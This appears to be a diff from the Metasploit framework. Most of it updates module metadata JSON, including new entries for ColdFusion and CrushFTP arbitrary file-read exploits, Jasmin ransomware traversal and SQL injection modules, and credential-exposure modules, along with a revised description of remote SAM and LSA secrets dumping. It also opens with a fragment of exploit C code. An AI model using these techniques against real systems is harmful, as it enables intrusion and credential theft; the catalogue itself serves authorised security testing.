 // byte write pointer to an 8-byte aligned argv-list pointer and
 // update argv[0] to point to argv[1..n].
  writeCount=(((int)argvStackAddress)-(writeCount+56))&0xffff;
@@ -83,6 +83,8 @@
 <% description = "The module is expected to get a shell every time it runs." %>
 <% elsif reliability == "unreliable-session" %>
 <% description = "The module isn't expected to get a shell reliably (such as only once)." %>
+<% elsif reliability == "event-dependent" %>
+<% description = "The module may not execute the payload until an external event occurs. For instance, a cron job, machine restart, user interaction within a GUI element, etc." %>
 <% end %>

 * **<%= reliability %>:** <%= description %>
@@ -61,3 +61,4 @@ woocommerce-payments
 file-manager-advanced-shortcode
 royal-elementor-addons
 backup-backup
+hash-form
@@ -34566,6 +34566,7 @@ hash-comment-ip
 hash-converter
 hash-coupon
 hash-elements
+hash-form
 hash-hash-tags
 hash-link-scroll-offset
 hashbar-wp-notification-bar
@@ -771,7 +771,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2023-03-13 10:31:27 +0000",
+    "mod_time": "2024-04-26 12:33:43 +0000",
    "path": "/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb",
    "is_install_path": true,
    "ref_name": "admin/dcerpc/cve_2022_26923_certifried",
@@ -903,7 +903,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2024-03-01 12:00:34 +0000",
+    "mod_time": "2024-04-16 16:43:30 +0000",
    "path": "/modules/auxiliary/admin/dcerpc/samr_computer.rb",
    "is_install_path": true,
    "ref_name": "admin/dcerpc/samr_computer",
@@ -6416,7 +6416,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-03-07 13:28:22 +0000",
+    "mod_time": "2024-05-02 13:57:13 +0000",
    "path": "/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb",
    "is_install_path": true,
    "ref_name": "admin/ldap/ad_cs_cert_template",
@@ -6438,7 +6438,9 @@
        "Certipy"
      ]
    },
-    "session_types": false,
+    "session_types": [
+      "ldap"
+    ],
    "needs_cleanup": false,
    "actions": [
      {
@@ -6489,7 +6491,7 @@

    ],
    "targets": null,
-    "mod_time": "2023-02-24 13:50:04 +0000",
+    "mod_time": "2024-05-02 13:57:13 +0000",
    "path": "/modules/auxiliary/admin/ldap/rbcd.rb",
    "is_install_path": true,
    "ref_name": "admin/ldap/rbcd",
@@ -6507,7 +6509,9 @@

      ]
    },
-    "session_types": false,
+    "session_types": [
+      "ldap"
+    ],
    "needs_cleanup": false,
    "actions": [
      {
@@ -6556,7 +6560,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-04-09 07:53:26 +0000",
+    "mod_time": "2024-05-02 13:57:13 +0000",
    "path": "/modules/auxiliary/admin/ldap/shadow_credentials.rb",
    "is_install_path": true,
    "ref_name": "admin/ldap/shadow_credentials",
@@ -6574,7 +6578,9 @@

      ]
    },
-    "session_types": false,
+    "session_types": [
+      "ldap"
+    ],
    "needs_cleanup": false,
    "actions": [
      {
@@ -6627,12 +6633,12 @@

    ],
    "targets": null,
-    "mod_time": "2023-10-12 19:08:51 +0000",
+    "mod_time": "2024-05-02 13:57:13 +0000",
    "path": "/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "admin/ldap/vmware_vcenter_vmdir_auth_bypass",
    "check": true,
-    "post_auth": false,
+    "post_auth": true,
    "default_credential": false,
    "notes": {
      "Stability": [
@@ -6646,7 +6652,9 @@

      ]
    },
-    "session_types": false,
+    "session_types": [
+      "ldap"
+    ],
    "needs_cleanup": false,
    "actions": [
      {
@@ -6903,7 +6911,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2024-02-19 10:57:53 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
    "path": "/modules/auxiliary/admin/mssql/mssql_enum.rb",
    "is_install_path": true,
    "ref_name": "admin/mssql/mssql_enum",
@@ -7104,7 +7112,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2024-02-19 10:34:16 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
    "path": "/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb",
    "is_install_path": true,
    "ref_name": "admin/mssql/mssql_escalate_dbowner",
@@ -7205,7 +7213,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2024-02-14 15:26:34 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
    "path": "/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb",
    "is_install_path": true,
    "ref_name": "admin/mssql/mssql_escalate_execute_as",
@@ -7308,7 +7316,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2024-03-27 09:54:38 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
    "path": "/modules/auxiliary/admin/mssql/mssql_exec.rb",
    "is_install_path": true,
    "ref_name": "admin/mssql/mssql_exec",
@@ -7364,7 +7372,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2024-02-19 10:57:53 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
    "path": "/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb",
    "is_install_path": true,
    "ref_name": "admin/mssql/mssql_findandsampledata",
@@ -7415,7 +7423,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2024-02-19 10:34:16 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
    "path": "/modules/auxiliary/admin/mssql/mssql_idf.rb",
    "is_install_path": true,
    "ref_name": "admin/mssql/mssql_idf",
@@ -7567,7 +7575,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2024-03-27 09:54:38 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
    "path": "/modules/auxiliary/admin/mssql/mssql_sql.rb",
    "is_install_path": true,
    "ref_name": "admin/mssql/mssql_sql",
@@ -7618,7 +7626,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2024-02-19 10:34:16 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
    "path": "/modules/auxiliary/admin/mssql/mssql_sql_file.rb",
    "is_install_path": true,
    "ref_name": "admin/mssql/mssql_sql_file",
@@ -9198,6 +9206,67 @@

    ]
  },
+  "auxiliary_admin/registry_security_descriptor": {
+    "name": "Windows Registry Security Descriptor Utility",
+    "fullname": "auxiliary/admin/registry_security_descriptor",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Christophe De La Fuente"
+    ],
+    "description": "Read or write a Windows registry security descriptor remotely.\n\n          In READ mode, the `FILE` option can be set to specify where the\n          security descriptor should be written to.\n\n          The following format is used:\n          ```\n          key: <registry key>\n          security_info: <security information>\n          sd: <security descriptor as a hex string>\n          ```\n\n          In WRITE mode, the `FILE` option can be used to specify the information\n          needed to write the security descriptor to the remote registry. The file must\n          follow the same format as described above.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 445,
+    "autofilter_ports": [
+      139,
+      445
+    ],
+    "autofilter_services": [
+      "netbios-ssn",
+      "microsoft-ds"
+    ],
+    "targets": null,
+    "mod_time": "2024-05-13 12:01:54 +0000",
+    "path": "/modules/auxiliary/admin/registry_security_descriptor.rb",
+    "is_install_path": true,
+    "ref_name": "admin/registry_security_descriptor",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "smb"
+    ],
+    "needs_cleanup": false,
+    "actions": [
+      {
+        "name": "READ",
+        "description": "Read a Windows registry security descriptor"
+      },
+      {
+        "name": "WRITE",
+        "description": "Write a Windows registry security descriptor"
+      }
+    ]
+  },
  "auxiliary_admin/sap/cve_2020_6207_solman_rce": {
    "name": "SAP Solution Manager remote unauthorized OS commands execution",
    "fullname": "auxiliary/admin/sap/cve_2020_6207_solman_rce",
@@ -19776,7 +19845,7 @@

    ],
    "targets": null,
-    "mod_time": "2023-12-01 08:03:32 +0000",
+    "mod_time": "2024-05-02 13:57:13 +0000",
    "path": "/modules/auxiliary/gather/asrep.rb",
    "is_install_path": true,
    "ref_name": "gather/asrep",
@@ -19798,7 +19867,9 @@
        "asreproast"
      ]
    },
-    "session_types": false,
+    "session_types": [
+      "ldap"
+    ],
    "needs_cleanup": false,
    "actions": [
      {
@@ -20616,6 +20687,70 @@
      }
    ]
  },
+  "auxiliary_gather/coldfusion_pms_servlet_file_read": {
+    "name": "CVE-2024-20767 - Adobe Coldfusion Arbitrary File Read",
+    "fullname": "auxiliary/gather/coldfusion_pms_servlet_file_read",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2024-03-12",
+    "type": "auxiliary",
+    "author": [
+      "ma4ter",
+      "yoryio",
+      "Christiaan Beek",
+      "jheysel-r7"
+    ],
+    "description": "This module exploits an Improper Access Vulnerability in Adobe Coldfusion versions prior to version\n          '2023 Update 6' and '2021 Update 12'. The vulnerability allows unauthenticated attackers to request authentication\n          token in the form of a UUID from the /CFIDE/adminapi/_servermanager/servermanager.cfc endpoint. Using that\n          UUID attackers can hit the /pms endpoint in order to exploit the Arbitrary File Read Vulnerability.",
+    "references": [
+      "CVE-2024-20767",
+      "URL-https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html",
+      "URL-https://jeva.cc/2973.html"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8500,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-05-02 09:47:22 +0000",
+    "path": "/modules/auxiliary/gather/coldfusion_pms_servlet_file_read.rb",
+    "is_install_path": true,
+    "ref_name": "gather/coldfusion_pms_servlet_file_read",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_gather/coldfusion_pwd_props": {
    "name": "ColdFusion 'password.properties' Hash Extraction",
    "fullname": "auxiliary/gather/coldfusion_pwd_props",
@@ -20770,6 +20905,66 @@

    ]
  },
+  "auxiliary_gather/crushftp_fileread_cve_2024_4040": {
+    "name": "CrushFTP Unauthenticated Arbitrary File Read",
+    "fullname": "auxiliary/gather/crushftp_fileread_cve_2024_4040",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "remmons-r7"
+    ],
+    "description": "This module leverages an unauthenticated server-side template injection vulnerability in CrushFTP < 10.7.1 and\n          < 11.1.0 (as well as legacy 9.x versions). Attackers can submit template injection payloads to the web API without\n          authentication. When attacker payloads are reflected in the server's responses, the payloads are evaluated. The\n          primary impact of the injection is arbitrary file read as root, which can result in authentication bypass, remote\n          code execution, and NetNTLMv2 theft (when the host OS is Windows and SMB egress traffic is permitted).",
+    "references": [
+      "CVE-2024-4040",
+      "URL-https://attackerkb.com/topics/20oYjlmfXa/cve-2024-4040/rapid7-analysis"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-05-03 12:01:48 +0000",
+    "path": "/modules/auxiliary/gather/crushftp_fileread_cve_2024_4040.rb",
+    "is_install_path": true,
+    "ref_name": "gather/crushftp_fileread_cve_2024_4040",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_gather/cve_2021_27850_apache_tapestry_hmac_key": {
    "name": "Apache Tapestry HMAC secret key leak",
    "fullname": "auxiliary/gather/cve_2021_27850_apache_tapestry_hmac_key",
@@ -22591,6 +22786,129 @@

    ]
  },
+  "auxiliary_gather/jasmin_ransomware_dir_traversal": {
+    "name": "Jasmin Ransomware Web Server Unauthenticated Directory Traversal",
+    "fullname": "auxiliary/gather/jasmin_ransomware_dir_traversal",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2023-04-08",
+    "type": "auxiliary",
+    "author": [
+      "chebuya",
+      "h00die"
+    ],
+    "description": "The Jasmin Ransomware web server contains an unauthenticated directory traversal vulnerability\n          within the download functionality. As of April 15, 2024 this was still unpatched, so all\n          versions are vulnerable. The last patch was in 2021, so it will likely not ever be patched.",
+    "references": [
+      "CVE-2024-30851",
+      "URL-https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc",
+      "URL-https://github.com/codesiddhant/Jasmin-Ransomware"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-05-04 16:06:48 +0000",
+    "path": "/modules/auxiliary/gather/jasmin_ransomware_dir_traversal.rb",
+    "is_install_path": true,
+    "ref_name": "gather/jasmin_ransomware_dir_traversal",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
+  "auxiliary_gather/jasmin_ransomware_sqli": {
+    "name": "Jasmin Ransomware Web Server Unauthenticated SQL Injection",
+    "fullname": "auxiliary/gather/jasmin_ransomware_sqli",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2023-04-08",
+    "type": "auxiliary",
+    "author": [
+      "chebuya",
+      "h00die"
+    ],
+    "description": "The Jasmin Ransomware web server contains an unauthenticated SQL injection vulnerability\n          within the login functionality. As of April 15, 2024 this was still unpatched, so all\n          versions are vulnerable. The last patch was in 2021, so it will likely not ever be patched.\n\n          Retrieving the victim's data may take a long amount of time. It is much quicker to\n          get the logins, then just login to the site.",
+    "references": [
+      "URL-https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc",
+      "URL-https://github.com/codesiddhant/Jasmin-Ransomware"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-05-04 16:06:48 +0000",
+    "path": "/modules/auxiliary/gather/jasmin_ransomware_sqli.rb",
+    "is_install_path": true,
+    "ref_name": "gather/jasmin_ransomware_sqli",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_gather/java_rmi_registry": {
    "name": "Java RMI Registry Interfaces Enumeration",
    "fullname": "auxiliary/gather/java_rmi_registry",
@@ -23153,7 +23471,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-03-07 13:28:22 +0000",
+    "mod_time": "2024-05-02 13:57:13 +0000",
    "path": "/modules/auxiliary/gather/ldap_esc_vulnerable_cert_finder.rb",
    "is_install_path": true,
    "ref_name": "gather/ldap_esc_vulnerable_cert_finder",
@@ -23175,7 +23493,9 @@
        "Certipy"
      ]
    },
-    "session_types": false,
+    "session_types": [
+      "ldap"
+    ],
    "needs_cleanup": false,
    "actions": [

@@ -23208,7 +23528,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-01-07 15:02:53 +0000",
+    "mod_time": "2024-05-02 13:57:13 +0000",
    "path": "/modules/auxiliary/gather/ldap_hashdump.rb",
    "is_install_path": true,
    "ref_name": "gather/ldap_hashdump",
@@ -23226,7 +23546,9 @@

      ]
    },
-    "session_types": false,
+    "session_types": [
+      "ldap"
+    ],
    "needs_cleanup": false,
    "actions": [
      {
@@ -23261,7 +23583,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-01-07 15:02:53 +0000",
+    "mod_time": "2024-05-02 13:57:13 +0000",
    "path": "/modules/auxiliary/gather/ldap_query.rb",
    "is_install_path": true,
    "ref_name": "gather/ldap_query",
@@ -23279,7 +23601,9 @@

      ]
    },
-    "session_types": false,
+    "session_types": [
+      "ldap"
+    ],
    "needs_cleanup": false,
    "actions": [
      {
@@ -23860,6 +24184,67 @@

    ]
  },
+  "auxiliary_gather/mongodb_ops_manager_diagnostic_archive_info": {
+    "name": "MongoDB Ops Manager Diagnostic Archive Sensitive Information Retriever",
+    "fullname": "auxiliary/gather/mongodb_ops_manager_diagnostic_archive_info",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2023-06-09",
+    "type": "auxiliary",
+    "author": [
+      "h00die"
+    ],
+    "description": "MongoDB Ops Manager Diagnostics Archive does not redact SAML SSL Pem Key File Password\n          field (mms.saml.ssl.PEMKeyFilePassword) within app settings. Archives do not include\n          the PEM files themselves. This module extracts that unredacted password and stores\n          the diagnostic archive for additional manual review.\n\n          This issue affects MongoDB Ops Manager v5.0 prior to 5.0.21 and\n          MongoDB Ops Manager v6.0 prior to 6.0.12.\n\n          API credentials with the role of GLOBAL_MONITORING_ADMIN or GLOBAL_OWNER are required.\n\n          Successfully tested against MongoDB Ops Manager v6.0.11.",
+    "references": [
+      "URL-https://github.com/advisories/GHSA-xqvf-v5jg-pxc2",
+      "URL-https://www.mongodb.com/docs/ops-manager/current/reference/configuration/#mongodb-setting-mms.https.PEMKeyFilePassword",
+      "CVE-2023-0342"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-04-07 05:39:51 +0000",
+    "path": "/modules/auxiliary/gather/mongodb_ops_manager_diagnostic_archive_info.rb",
+    "is_install_path": true,
+    "ref_name": "gather/mongodb_ops_manager_diagnostic_archive_info",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_gather/ms14_052_xmldom": {
    "name": "MS14-052 Microsoft Internet Explorer XMLDOM Filename Disclosure",
    "fullname": "auxiliary/gather/ms14_052_xmldom",
@@ -25078,6 +25463,70 @@

    ]
  },
+  "auxiliary_gather/rancher_authenticated_api_cred_exposure": {
+    "name": "Rancher Authenticated API Credential Exposure",
+    "fullname": "auxiliary/gather/rancher_authenticated_api_cred_exposure",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2022-08-18",
+    "type": "auxiliary",
+    "author": [
+      "h00die",
+      "Florian Struck",
+      "Marco Stuurman"
+    ],
+    "description": "An issue was discovered in Rancher versions up to and including\n          2.5.15 and 2.6.6 where sensitive fields, like passwords, API keys\n          and Ranchers service account token (used to provision clusters),\n          were stored in plaintext directly on Kubernetes objects like Clusters,\n          for example cluster.management.cattle.io. Anyone with read access to\n          those objects in the Kubernetes API could retrieve the plaintext\n          version of those sensitive data.",
+    "references": [
+      "URL-https://github.com/advisories/GHSA-g7j7-h4q8-8w2f",
+      "URL-https://github.com/fe-ax/tf-cve-2021-36782",
+      "URL-https://fe.ax/cve-2021-36782/",
+      "CVE-2021-36782"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-04-19 12:55:46 +0000",
+    "path": "/modules/auxiliary/gather/rancher_authenticated_api_cred_exposure.rb",
+    "is_install_path": true,
+    "ref_name": "gather/rancher_authenticated_api_cred_exposure",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_gather/redis_extractor": {
    "name": "Redis Extractor",
    "fullname": "auxiliary/gather/redis_extractor",
@@ -26151,7 +26600,7 @@

    ],
    "targets": null,
-    "mod_time": "2023-04-12 13:09:34 +0000",
+    "mod_time": "2024-05-02 13:57:13 +0000",
    "path": "/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb",
    "is_install_path": true,
    "ref_name": "gather/vmware_vcenter_vmdir_ldap",
@@ -26169,7 +26618,9 @@

      ]
    },
-    "session_types": false,
+    "session_types": [
+      "ldap"
+    ],
    "needs_cleanup": false,
    "actions": [
      {
@@ -26233,9 +26684,10 @@
    "type": "auxiliary",
    "author": [
      "Alberto Solino",
-      "Christophe De La Fuente"
+      "Christophe De La Fuente",
+      "antuache"
    ],
-    "description": "Dumps SAM hashes and LSA secrets (including cached creds) from the\n          remote Windows target without executing any agent locally. First, it\n          reads as much data as possible from the registry and then save the\n          hives locally on the target (%SYSTEMROOT%\\Temp\\random.tmp). Finally, it\n          downloads the temporary hive files and reads the rest of the data\n          from it. This temporary files are removed when it's done.\n\n          On domain controllers, secrets from Active Directory is extracted\n          using [MS-DRDS] DRSGetNCChanges(), replicating the attributes we need\n          to get SIDs, NTLM hashes, groups, password history, Kerberos keys and\n          other interesting data. Note that the actual `NTDS.dit` file is not\n          downloaded. Instead, the Directory Replication Service directly asks\n          Active Directory through RPC requests.\n\n          This modules takes care of starting or enabling the Remote Registry\n          service if needed. It will restore the service to its original state\n          when it's done.\n\n          This is a port of the great Impacket `secretsdump.py` code written by\n          Alberto Solino.",
+    "description": "Dumps SAM hashes and LSA secrets (including cached creds) from the\n          remote Windows target without executing any agent locally. This is\n          done by remotely updating the registry key security descriptor,\n          taking advantage of the WriteDACL privileges held by local\n          administrators to set temporary read permissions.\n\n          This can be disabled by setting the `INLINE` option to false and the\n          module will fallback to the original implementation, which consists\n          in saving the registry hives locally on the target\n          (%SYSTEMROOT%\\Temp\\<random>.tmp), downloading the temporary hive\n          files and reading the data from it. This temporary files are removed\n          when it's done.\n\n          On domain controllers, secrets from Active Directory is extracted\n          using [MS-DRDS] DRSGetNCChanges(), replicating the attributes we need\n          to get SIDs, NTLM hashes, groups, password history, Kerberos keys and\n          other interesting data. Note that the actual `NTDS.dit` file is not\n          downloaded. Instead, the Directory Replication Service directly asks\n          Active Directory through RPC requests.\n\n          This modules takes care of starting or enabling the Remote Registry\n          service if needed. It will restore the service to its original state\n          when it's done.\n\n          This is a port of the great Impacket `secretsdump.py` code written by\n          Alberto Solino.",
    "references": [
      "URL-https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py"
    ],
@@ -26251,7 +26703,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2024-03-06 14:20:34 +0000",
+    "mod_time": "2024-04-30 20:52:23 +0000",
    "path": "/modules/auxiliary/gather/windows_secrets_dump.rb",
    "is_install_path": true,
    "ref_name": "gather/windows_secrets_dump",
@@ -26969,7 +27421,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-08-31 16:50:37 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/acpp/login.rb",
    "is_install_path": true,
    "ref_name": "scanner/acpp/login",
@@ -27011,7 +27463,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-01-07 15:02:53 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/afp/afp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/afp/afp_login",
@@ -27374,7 +27826,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/db2/db2_auth.rb",
    "is_install_path": true,
    "ref_name": "scanner/db2/db2_auth",
@@ -28652,7 +29104,7 @@
      "ftp"
    ],
    "targets": null,
-    "mod_time": "2023-04-18 23:44:58 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/ftp/ftp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/ftp/ftp_login",
@@ -29163,7 +29615,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/advantech_webaccess_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/advantech_webaccess_login",
@@ -29807,7 +30259,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 15:37:48 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/appletv_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/appletv_login",
@@ -29967,7 +30419,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/axis_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/axis_login",
@@ -30019,7 +30471,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-10-05 13:19:36 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/azure_ad_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/azure_ad_login",
@@ -30171,7 +30623,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/bavision_cam_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/bavision_cam_login",
@@ -30479,7 +30931,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/buffalo_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/buffalo_login",
@@ -30583,7 +31035,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/caidao_bruteforce_login",
@@ -30840,7 +31292,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-09-02 11:41:27 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/chef_webui_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/chef_webui_login",
@@ -31266,7 +31718,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/cisco_firepower_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_firepower_login",
@@ -32312,7 +32764,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/directadmin_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/directadmin_login",
@@ -34377,7 +34829,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/gitlab_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/gitlab_login",
@@ -34442,6 +34894,56 @@

    ]
  },
+  "auxiliary_scanner/http/gitlab_version": {
+    "name": "Gitlab Version Scanner",
+    "fullname": "auxiliary/scanner/http/gitlab_version",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Julien (jvoisin) Voisin"
+    ],
+    "description": "This module scans a Gitlab install for information about its version.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-04-24 10:20:59 +0000",
+    "path": "/modules/auxiliary/scanner/http/gitlab_version.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/gitlab_version",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_scanner/http/glassfish_login": {
    "name": "GlassFish Brute Force Utility",
    "fullname": "auxiliary/scanner/http/glassfish_login",
